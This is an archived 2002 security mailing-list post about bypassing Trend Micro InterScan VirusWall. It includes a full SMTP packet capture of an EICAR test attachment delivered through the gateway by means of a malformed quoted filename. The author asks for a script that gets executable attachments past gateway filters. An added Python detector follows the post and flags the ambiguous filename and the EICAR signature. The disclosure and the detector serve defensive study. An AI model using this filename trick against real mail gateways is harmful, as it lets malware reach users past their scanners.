bypassing attachments

From: Onie Camara (neilat_private)
Date: Sat Feb 23 2002 - 09:37:29 PST


    Hi guys,
    
    I don't know where to post, actually.
    
    I am very interested in security and would like some of your help.
    
    I have found, I hope, a vulnerability in Trend Micro InterScan VirusWall.
    I have a setup of qmail and sqwebmail running on FreeBSD. When I send an
    email from sqwebmail containing the EICAR test virus attachment, the
    attachment is bypassed by InterScan and is successfully delivered.
    
    I have escalated this to Trend Micro since the early week of January and
    until now, even with the latest pattern file, it is still bypassed.
    
    This is somewhat related to the Feb 18 post at
    http://www.securiteam.com/securitynews/5DP0I206AY.html
    
    Now, since I will be doing a pentest for another company, I would like some
    help on where I can download a Perl script that will send an exe/com
    attachment to a mail server but will bypass the filtering gateway.
    
    I have used this script, http://www.securiteam.com/exploits/5ZP0D2K6AY.html
    It works, but the attachment's extension changes. Ex. eicar.com will become
    eicar._com
    
    Here is a tcpdump:
    
    bash# tcpdump -x -X -s 14400 port not 22 and port not 53 and not arp and
    port not 68 and port not 67 and port not 80 and not igmp
    tcpdump: listening on xl0
    11:23:45.478174 65.192.117.68.1760 > dhcp-74-1628.smtp: S
    2796302688:2796302688(0) win 16384 <mss 1460,nop,nop,sackOK,nop,wscale
    0,nop,nop,timestamp 546622090 0> (DF)
    0x0000   4500 0040 66b1 4000 3406 1f70 41c0 7544        E..@f.@.4..pA.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 3160 0000 0000        ..........1`....
    0x0020   b002 4000 6b45 0000 0204 05b4 0101 0402        ..@.kE..........
    0x0030   0103 0300 0101 080a 2094 ca8a 0000 0000        ................
    11:23:45.478679 dhcp-74-1628.smtp > 65.192.117.68.1760: S
    1437153606:1437153606(0) ack 2796302689 win 33304 <mss 1460,nop,wscale
    0,nop,nop,timestamp 908042 546622090> (DF)
    0x0000   4500 003c 0f7c 4000 4006 6aa9 0cf8 fc9a        E..<.|@.@.j.....
    0x0010   41c0 7544 0019 06e0 55a9 3946 a6ac 3161        A.uD....U.9F..1a
    0x0020   a012 8218 d41b 0000 0204 05b4 0103 0300        ................
    0x0030   0101 080a 000d db0a 2094 ca8a                  ............
    11:23:45.494674 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 1 win 17376
    <nop,nop,timestamp 546622090 908042> (DF)
    0x0000   4500 0034 42c4 4000 3406 4369 41c0 7544        E..4B.@.4.CiA.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3947        ..........1aU.9G
    0x0020   8010 43e0 3e18 0000 0101 080a 2094 ca8a        ..C.>...........
    0x0030   000d db0a                                      ....
    11:23:45.530047 dhcp-74-1628.smtp > 65.192.117.68.1760: P 1:43(42) ack 1 win
    33304 <nop,nop,timestamp 908048 546622090> (DF)
    0x0000   4500 005e 7e6d 4000 4006 fb95 0cf8 fc9a        E..^~m@.@.......
    0x0010   41c0 7544 0019 06e0 55a9 3947 a6ac 3161        A.uD....U.9G..1a
    0x0020   8018 8218 e931 0000 0101 080a 000d db10        .....1..........
    0x0030   2094 ca8a 3232 3020 7072 6f6d 6973 6375        ....220.promiscu
    0x0040   6f75 732e 6479 6e64 6e73 2e6f 7267 2045        ous.dyndns.org.E
    0x0050   534d 5450 2050 6f73 7466 6978 0d0a             SMTP.Postfix..
    11:23:45.553735 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 43 win 17376
    <nop,nop,timestamp 546622090 908048> (DF)
    0x0000   4500 0034 2223 4000 3406 640a 41c0 7544        E..4"#@.4.d.A.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971        ..........1aU.9q
    0x0020   8010 43e0 3de8 0000 0101 080a 2094 ca8a        ..C.=...........
    0x0030   000d db10                                      ....
    11:23:45.553933 65.192.117.68.1760 > dhcp-74-1628.smtp: P 1:33(32) ack 43
    win 17376 <nop,nop,timestamp 546622090 908048> (DF)
    0x0000   4500 0054 5ac7 4000 3406 2b46 41c0 7544        E..TZ.@.4.+FA.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971        ..........1aU.9q
    0x0020   8018 43e0 85fe 0000 0101 080a 2094 ca8a        ..C.............
    0x0030   000d db10 4548 4c4f 2061 6e74 6973 7061        ....EHLO.antispa
    0x0040   6d2e 7265 6d69 6e67 746f 6e6c 7464 2e63        m.remingtonltd.c
    0x0050   6f6d 0d0a                                      om..
    11:23:45.554671 dhcp-74-1628.smtp > 65.192.117.68.1760: P 43:151(108) ack 33
    win 33304 <nop,nop,timestamp 908050 546622090> (DF)
    0x0000   4500 00a0 b62a 4000 4006 c396 0cf8 fc9a        E....*@.@.......
    0x0010   41c0 7544 0019 06e0 55a9 3971 a6ac 3181        A.uD....U.9q..1.
    0x0020   8018 8218 5f91 0000 0101 080a 000d db12        ...._...........
    0x0030   2094 ca8a 3235 302d 7072 6f6d 6973 6375        ....250-promiscu
    0x0040   6f75 732e 6479 6e64 6e73 2e6f 7267 0d0a        ous.dyndns.org..
    0x0050   3235 302d 5049 5045 4c49 4e49 4e47 0d0a        250-PIPELINING..
    0x0060   3235 302d 5349 5a45 2032 3030 3030 3030        250-SIZE.2000000
    0x0070   300d 0a32 3530 2d56 5246 590d 0a32 3530        0..250-VRFY..250
    0x0080   2d45 5452 4e0d 0a32 3530 2d58 5645 5250        -ETRN..250-XVERP
    0x0090   0d0a 3235 3020 3842 4954 4d49 4d45 0d0a        ..250.8BITMIME..
    11:23:45.571627 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 151 win 17268
    <nop,nop,timestamp 546622090 908050> (DF)
    0x0000   4500 0034 0598 4000 3406 8095 41c0 7544        E..4..@.4...A.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd        ..........1.U.9.
    0x0020   8010 4374 3dc6 0000 0101 080a 2094 ca8a        ..Ct=...........
    0x0030   000d db12                                      ....
    11:23:45.573727 65.192.117.68.1760 > dhcp-74-1628.smtp: P 33:101(68) ack 151
    win 17376 <nop,nop,timestamp 546622090 908050> (DF)
    0x0000   4500 0078 01ee 4000 3406 83fb 41c0 7544        E..x..@.4...A.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd        ..........1.U.9.
    0x0020   8018 43e0 4202 0000 0101 080a 2094 ca8a        ..C.B...........
    0x0030   000d db12 4d41 494c 2046 524f 4d3a 3c3e        ....MAIL.FROM:<>
    0x0040   2053 495a 453d 3131 3139 0d0a 5243 5054        .SIZE=1119..RCPT
    0x0050   2054 4f3a 3c6e 6569 6c40 7265 7374 7269        .TO:<neil@restri
    0x0060   6374 6564 2e64 796e 646e 732e 6f72 673e        cted.dyndns.org>
    0x0070   0d0a 4441 5441 0d0a                            ..DATA..
    11:23:45.580592 dhcp-74-1628.smtp > 65.192.117.68.1760: P 151:204(53) ack
    101 win 33304 <nop,nop,timestamp 908053 546622090> (DF)
    0x0000   4500 0069 6a03 4000 4006 0ff5 0cf8 fc9a        E..ij.@.@.......
    0x0010   41c0 7544 0019 06e0 55a9 39dd a6ac 31c5        A.uD....U.9...1.
    0x0020   8018 8218 502b 0000 0101 080a 000d db15        ....P+..........
    0x0030   2094 ca8a 3235 3020 4f6b 0d0a 3235 3020        ....250.Ok..250.
    0x0040   4f6b 0d0a 3335 3420 456e 6420 6461 7461        Ok..354.End.data
    0x0050   2077 6974 6820 3c43 523e 3c4c 463e 2e3c        .with.<CR><LF>.<
    0x0060   4352 3e3c 4c46 3e0d 0a                         CR><LF>..
    11:23:45.607780 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 204 win 17323
    <nop,nop,timestamp 546622090 908053> (DF)
    0x0000   4500 0034 2d7e 4000 3406 58af 41c0 7544        E..4-~@.4.X.A.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12        ..........1.U.:.
    0x0020   8010 43ab 3d13 0000 0101 080a 2094 ca8a        ..C.=...........
    0x0030   000d db15                                      ....
    11:23:45.615561 65.192.117.68.1760 > dhcp-74-1628.smtp: P 101:1229(1128) ack
    204 win 17376 <nop,nop,timestamp 546622090 908053> (DF)
    0x0000   4500 049c 4e19 4000 3406 33ac 41c0 7544        E...N.@.4.3.A.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12        ..........1.U.:.
    0x0020   8018 43e0 715b 0000 0101 080a 2094 ca8a        ..C.q[..........
    0x0030   000d db15 5265 6365 6976 6564 3a20 6672        ....Received:.fr
    0x0040   6f6d 2079 6f75 2028 6c6f 6361 6c68 6f73        om.you.(localhos
    0x0050   7420 5b31 3237 2e30 2e30 2e31 5d29 0d0a        t.[127.0.0.1])..
    0x0060   0962 7920 616e 7469 7370 616d 2e72 656d        .by.antispam.rem
    0x0070   696e 6774 6f6e 6c74 642e 636f 6d20 2850        ingtonltd.com.(P
    0x0080   6f73 7466 6978 2920 7769 7468 2053 4d54        ostfix).with.SMT
    0x0090   5020 6964 2036 3730 4237 4538 4434 0d0a        P.id.670B7E8D4..
    0x00a0   0966 6f72 203c 6e65 696c 4072 6573 7472        .for.<neil@restr
    0x00b0   6963 7465 642e 6479 6e64 6e73 2e6f 7267        icted.dyndns.org
    0x00c0   3e3b 2053 6174 2c20 3233 2046 6562 2032        >;.Sat,.23.Feb.2
    0x00d0   3030 3220 3131 3a31 363a 3137 202d 3036        002.11:16:17.-06
    0x00e0   3030 2028 4353 5429 0d0a 4672 6f6d 3a20        00.(CST)..From:.
    0x00f0   736f 6d65 4072 656d 696e 6774 6f6e 6c74        some@remingtonlt
    0x0100   642e 636f 6d0d 0a54 6f3a 206e 6569 6c40        d.com..To:.neil@
    0x0110   7265 7374 7269 6374 6564 2e64 796e 646e        restricted.dyndn
    0x0120   732e 6f72 670d 0a53 7562 6a65 6374 3a20        s.org..Subject:.
    0x0130   7465 7374 0d0a 4d49 4d45 2d56 6572 7369        test..MIME-Versi
    0x0140   6f6e 3a20 312e 300d 0a43 6f6e 7465 6e74        on:.1.0..Content
    0x0150   2d54 7970 653a 206d 756c 7469 7061 7274        -Type:.multipart
    0x0160   2f72 656c 6174 6564 3b0d 0a20 2020 2020        /related;.......
    0x0170   2020 2074 7970 653d 226d 756c 7469 7061        ...type="multipa
    0x0180   7274 2f61 6c74 6572 6e61 7469 7665 223b        rt/alternative";
    0x0190   0d0a 2020 2020 2020 2020 626f 756e 6461        ..........bounda
    0x01a0   7279 3d22 4e65 7874 5061 7274 3139 220d        ry="NextPart19".
    0x01b0   0a4d 6573 7361 6765 2d49 643a 203c 3230        .Message-Id:.<20
    0x01c0   3032 3032 3233 3137 3136 3137 2e36 3730        020223171617.670
    0x01d0   4237 4538 4434 4061 6e74 6973 7061 6d2e        B7E8D4@antispam.
    0x01e0   7265 6d69 6e67 746f 6e6c 7464 2e63 6f6d        remingtonltd.com
    0x01f0   3e0d 0a44 6174 653a 2053 6174 2c20 3233        >..Date:.Sat,.23
    0x0200   2046 6562 2032 3030 3220 3131 3a31 363a        .Feb.2002.11:16:
    0x0210   3137 202d 3036 3030 2028 4353 5429 0d0a        17.-0600.(CST)..
    0x0220   0d0a 5468 6973 2069 7320 6120 6d75 6c74        ..This.is.a.mult
    0x0230   692d 7061 7274 206d 6573 7361 6765 2069        i-part.message.i
    0x0240   6e20 4d49 4d45 2066 6f72 6d61 742e 0d0a        n.MIME.format...
    0x0250   0d0a 2d2d 4e65 7874 5061 7274 3139 0d0a        ..--NextPart19..
    0x0260   436f 6e74 656e 742d 5479 7065 3a20 6d75        Content-Type:.mu
    0x0270   6c74 6970 6172 742f 616c 7465 726e 6174        ltipart/alternat
    0x0280   6976 653b 0d0a 2020 2020 2020 2020 626f        ive;..........bo
    0x0290   756e 6461 7279 3d22 4e65 7874 5061 7274        undary="NextPart
    0x02a0   3230 220d 0a0d 0a2d 2d4e 6578 7450 6172        20"....--NextPar
    0x02b0   7432 300d 0a43 6f6e 7465 6e74 2d54 7970        t20..Content-Typ
    0x02c0   653a 2074 6578 742f 706c 6169 6e0d 0a43        e:.text/plain..C
    0x02d0   6f6e 7465 6e74 2d54 7261 6e73 6665 722d        ontent-Transfer-
    0x02e0   456e 636f 6469 6e67 3a20 7175 6f74 6564        Encoding:.quoted
    0x02f0   2d70 7269 6e74 6162 6c65 0d0a 0d0a 2d2d        -printable....--
    0x0300   4e65 7874 5061 7274 3230 0d0a 436f 6e74        NextPart20..Cont
    0x0310   656e 742d 5479 7065 3a20 7465 7874 2f68        ent-Type:.text/h
    0x0320   746d 6c3b 0d0a 2020 2020 2020 2020 6368        tml;..........ch
    0x0330   6172 7365 743d 2269 736f 2d38 3835 392d        arset="iso-8859-
    0x0340   3122 0d0a 436f 6e74 656e 742d 5472 616e        1"..Content-Tran
    0x0350   7366 6572 2d45 6e63 6f64 696e 673a 2071        sfer-Encoding:.q
    0x0360   756f 7465 642d 7072 696e 7461 626c 650d        uoted-printable.
    0x0370   0a0d 0a74 6573 740d 0a2d 2d4e 6578 7450        ...test..--NextP
    0x0380   6172 7432 302d 2d0d 0a0d 0a2d 2d4e 6578        art20--....--Nex
    0x0390   7450 6172 7431 390d 0a43 6f6e 7465 6e74        tPart19..Content
    0x03a0   2d54 7970 653a 2061 7070 6c69 6361 7469        -Type:.applicati
    0x03b0   6f6e 2f78 2d6d 7364 6f77 6e6c 6f61 640d        on/x-msdownload.
    0x03c0   0a43 6f6e 7465 6e74 2d44 6973 706f 7369        .Content-Disposi
    0x03d0   7469 6f6e 3a20 6174 7461 6368 6d65 6e74        tion:.attachment
    0x03e0   3b66 696c 656e 616d 653d 2265 6963 6172        ;filename="eicar
    0x03f0   2e22 636f 6d22 0d0a 436f 6e74 656e 742d        ."com"..Content-
    0x0400   5472 616e 7366 6572 2d45 6e63 6f64 696e        Transfer-Encodin
    0x0410   673a 2062 6173 6536 340d 0a0d 0a57 4456        g:.base64....WDV
    0x0420   5049 5641 6c51 4546 5157 7a52 6355 4670        PIVAlQEFQWzRcUFp
    0x0430   594e 5451 6f55 4634 704e 304e 444b 5464        YNTQoUF4pN0NDKTd
    0x0440   394a 4556 4a51 3046 534c 564e 5551 5535        9JEVJQ0FSLVNUQU5
    0x0450   4551 564a 454c 5546 4f56 456c 5753 564a        EQVJELUFOVElWSVJ
    0x0460   5655 7931 5552 564e 550d 0a4c 555a 4a54        VUy1URVNU..LUZJT
    0x0470   4555 684a 4567 7253 436f 4e43 673d 3d0d        EUhJEgrSCoNCg==.
    0x0480   0a0d 0a2d 2d4e 6578 7450 6172 7431 392d        ...--NextPart19-
    0x0490   2d0d 0a2e 0d0a 5155 4954 0d0a                  -.....QUIT..
    11:23:45.709692 dhcp-74-1628.smtp > 65.192.117.68.1760: . ack 1229 win 33304
    <nop,nop,timestamp 908066 546622090> (DF)
    0x0000   4500 0034 cc50 4000 4006 addc 0cf8 fc9a        E..4.P@.@.......
    0x0010   41c0 7544 0019 06e0 55a9 3a12 a6ac 362d        A.uD....U.:...6-
    0x0020   8010 8218 fa30 0000 0101 080a 000d db22        .....0........."
    0x0030   2094 ca8a                                      ....
    11:23:47.074647 dhcp-74-1628.smtp > 65.192.117.68.1760: P 204:243(39) ack
    1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
    0x0000   4500 005b 9c6c 4000 4006 dd99 0cf8 fc9a        E..[.l@.@.......
    0x0010   41c0 7544 0019 06e0 55a9 3a12 a6ac 362d        A.uD....U.:...6-
    0x0020   8018 8218 00bc 0000 0101 080a 000d dbaa        ................
    0x0030   2094 ca8a 3235 3020 4f6b 3a20 7175 6575        ....250.Ok:.queu
    0x0040   6564 2061 7320 3843 4237 3635 3334 3745        ed.as.8CB765347E
    0x0050   0d0a 3232 3120 4279 650d 0a                    ..221.Bye..
    11:23:47.074908 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
    1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
    0x0000   4500 0034 fa45 4000 4006 7fe7 0cf8 fc9a        E..4.E@.@.......
    0x0010   41c0 7544 0019 06e0 55a9 3a39 a6ac 362d        A.uD....U.:9..6-
    0x0020   8011 8218 f980 0000 0101 080a 000d dbaa        ................
    0x0030   2094 ca8a                                      ....
    11:23:47.091722 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 243 win 17376
    <nop,nop,timestamp 546622093 908202> (DF)
    0x0000   4500 0034 4a13 4000 3406 3c1a 41c0 7544        E..4J.@.4.<.A.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39        ..........6-U.:9
    0x0020   8010 43e0 37b7 0000 0101 080a 2094 ca8d        ..C.7...........
    0x0030   000d dbaa                                      ....
    11:23:47.092205 65.192.117.68.1760 > dhcp-74-1628.smtp: F 1229:1229(0) ack
    243 win 17376 <nop,nop,timestamp 546622093 908202> (DF)
    0x0000   4500 0034 4ca3 4000 3406 398a 41c0 7544        E..4L.@.4.9.A.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39        ..........6-U.:9
    0x0020   8011 43e0 37b6 0000 0101 080a 2094 ca8d        ..C.7...........
    0x0030   000d dbaa                                      ....
    11:23:47.092519 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
    1230 win 33304 <nop,nop,timestamp 908204 546622093> (DF)
    0x0000   4500 0034 f518 4000 4006 8514 0cf8 fc9a        E..4..@.@.......
    0x0010   41c0 7544 0019 06e0 55a9 3a39 a6ac 362e        A.uD....U.:9..6.
    0x0020   8011 8218 f97a 0000 0101 080a 000d dbac        .....z..........
    0x0030   2094 ca8d                                      ....
    11:23:47.097243 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
    <nop,nop,timestamp 546622093 908202> (DF)
    0x0000   4500 0034 5a93 4000 3406 2b9a 41c0 7544        E..4Z.@.4.+.A.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a        ..........6.U.::
    0x0020   8010 43e0 37b5 0000 0101 080a 2094 ca8d        ..C.7...........
    0x0030   000d dbaa                                      ....
    11:23:47.109155 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
    <nop,nop,timestamp 546622093 908204> (DF)
    0x0000   4500 0034 3e09 4000 3406 4824 41c0 7544        E..4>.@.4.H$A.uD
    0x0010   0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a        ..........6.U.::
    0x0020   8010 43e0 37b3 0000 0101 080a 2094 ca8d        ..C.7...........
    0x0030   000d dbac                                      ....
    ^C
    
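As an added example (not from the post, the securiteam script, or Trend Micro), a defender-side check in Python over the message visible in the capture above: it reads the raw Content-Disposition filename parameter twice, once strictly as an RFC 2045 quoted-string and once leniently with every quote dropped, flags the part when the two readings disagree, and matches the decoded payload against the EICAR signature regardless of what the file is called. The message bytes are reconstructed from the ASCII column of the dump (constructed sample) and the two-readings heuristic is my own; the post does not say how InterScan itself parses the quoted name.

```python
import email
import re

# Message body reconstructed from the ASCII column of the tcpdump in the post
# (constructed sample; the text/plain sub-part is omitted for brevity).
RAW_MSG = '''Content-Type: multipart/related; boundary="NextPart19"

--NextPart19
Content-Type: text/html; charset="iso-8859-1"

test
--NextPart19
Content-Type: application/x-msdownload
Content-Disposition: attachment;filename="eicar."com"
Content-Transfer-Encoding: base64

WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJELUFOVElWSVJVUy1URVNU
LUZJTEUhJEgrSCoNCg==

--NextPart19--
'''.replace("\n", "\r\n").encode()

EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"  # decoded from the base64 above

def filename_views(disposition):
    """Return (strict, lenient) readings of filename= in a raw Content-Disposition value:
    strict stops at the first unescaped quote (RFC 2045); lenient drops every quote."""
    m = re.search(r"filename=(.*)", disposition, re.I)
    if not m:
        return None, None
    raw = m.group(1).strip()
    q = re.match(r'"([^"\\]*(?:\\.[^"\\]*)*)"|([^;\s]*)', raw)
    strict = q.group(1) if q.group(1) is not None else q.group(2)
    lenient = raw.replace('"', "").split(";")[0].strip()
    return strict, lenient

def audit(raw_message):
    """Walk every leaf part; return (finding, detail) tuples worth a quarantine."""
    msg = email.message_from_bytes(raw_message)  # compat32 policy: header values stay raw
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        strict, lenient = filename_views(part.get("Content-Disposition", ""))
        if strict is not None and strict != lenient:  # scanner and client may see different names
            findings.append(("ambiguous-filename", f"{strict!r} vs {lenient!r}"))
        if EICAR in (part.get_payload(decode=True) or b""):  # content, not the name, decides
            findings.append(("eicar-signature", lenient))
    return findings
```

Running `audit(RAW_MSG)` on the captured message reports both the ambiguous file name (`'eicar.'` strictly versus `'eicar.com'` leniently) and the EICAR signature in the decoded body.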
    This archive was generated by hypermail 2b30 : Sat Feb 23 2002 - 10:09:50 PST